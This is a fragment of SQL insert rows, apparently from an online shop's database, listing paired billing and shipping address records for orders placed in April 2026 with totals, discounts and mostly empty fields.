(1565, 966, '2026-04-09 21:09:25', '2026-04-09 21:09:25', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1566, 966, '2026-04-09 21:09:25', '2026-04-09 21:09:25', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1567, 967, '2026-04-09 22:21:35', '2026-04-09 22:21:35', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1568, 967, '2026-04-09 22:21:35', '2026-04-09 22:21:35', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1569, 968, '2026-04-10 09:20:45', '2026-04-10 09:20:45', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1570, 968, '2026-04-10 09:20:45', '2026-04-10 09:20:45', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1571, 969, '2026-04-10 16:25:22', '2026-04-10 16:25:22', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1572, 969, '2026-04-10 16:25:22', '2026-04-10 16:25:22', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1573, 970, '2026-04-10 17:29:17', '2026-04-10 17:29:17', 133, 0, NULL, 'billing', 'uloxu.h.esuj.i.b.45@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1574, 970, '2026-04-10 17:29:17', '2026-04-10 17:29:17', 133, 0, NULL, 'shipping', 'uloxu.h.esuj.i.b.45@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1575, 971, '2026-04-10 17:46:48', '2026-04-10 17:46:48', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1576, 971, '2026-04-10 17:46:48', '2026-04-10 17:46:48', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1577, 972, '2026-04-10 19:06:03', '2026-04-10 19:06:03', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1578, 972, '2026-04-10 19:06:03', '2026-04-10 19:06:03', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1579, 973, '2026-04-10 23:17:30', '2026-04-10 23:17:30', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1580, 973, '2026-04-10 23:17:30', '2026-04-10 23:17:30', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1581, 974, '2026-04-11 04:15:29', '2026-04-11 04:15:29', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1582, 974, '2026-04-11 04:15:29', '2026-04-11 04:15:29', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1583, 975, '2026-04-11 04:15:31', '2026-04-11 04:15:31', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1584, 975, '2026-04-11 04:15:31', '2026-04-11 04:15:31', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1585, 976, '2026-04-11 04:15:42', '2026-04-11 04:15:42', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1586, 976, '2026-04-11 04:15:42', '2026-04-11 04:15:42', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1587, 977, '2026-04-11 04:15:47', '2026-04-11 04:15:47', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1588, 977, '2026-04-11 04:15:47', '2026-04-11 04:15:47', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1589, 978, '2026-04-11 04:15:52', '2026-04-11 04:15:52', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1590, 978, '2026-04-11 04:15:52', '2026-04-11 04:15:52', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1591, 979, '2026-04-11 04:15:55', '2026-04-11 04:15:55', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1592, 979, '2026-04-11 04:15:55', '2026-04-11 04:15:55', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1593, 980, '2026-04-11 04:15:58', '2026-04-11 04:15:58', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1594, 980, '2026-04-11 04:15:58', '2026-04-11 04:15:58', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1595, 981, '2026-04-11 04:16:03', '2026-04-11 04:16:03', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1596, 981, '2026-04-11 04:16:03', '2026-04-11 04:16:03', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1597, 982, '2026-04-11 04:16:09', '2026-04-11 04:16:09', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1598, 982, '2026-04-11 04:16:09', '2026-04-11 04:16:09', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1599, 983, '2026-04-11 04:16:12', '2026-04-11 04:16:12', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1600, 983, '2026-04-11 04:16:12', '2026-04-11 04:16:12', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1601, 984, '2026-04-11 04:16:16', '2026-04-11 04:16:16', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1602, 984, '2026-04-11 04:16:16', '2026-04-11 04:16:16', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1603, 985, '2026-04-11 04:16:33', '2026-04-11 04:16:33', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1604, 985, '2026-04-11 04:16:33', '2026-04-11 04:16:33', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1605, 986, '2026-04-11 04:16:38', '2026-04-11 04:16:38', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1606, 986, '2026-04-11 04:16:38', '2026-04-11 04:16:38', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1607, 987, '2026-04-11 04:16:42', '2026-04-11 04:16:42', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1608, 987, '2026-04-11 04:16:42', '2026-04-11 04:16:42', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1609, 988, '2026-04-11 04:16:58', '2026-04-11 04:16:58', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1610, 988, '2026-04-11 04:16:58', '2026-04-11 04:16:58', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
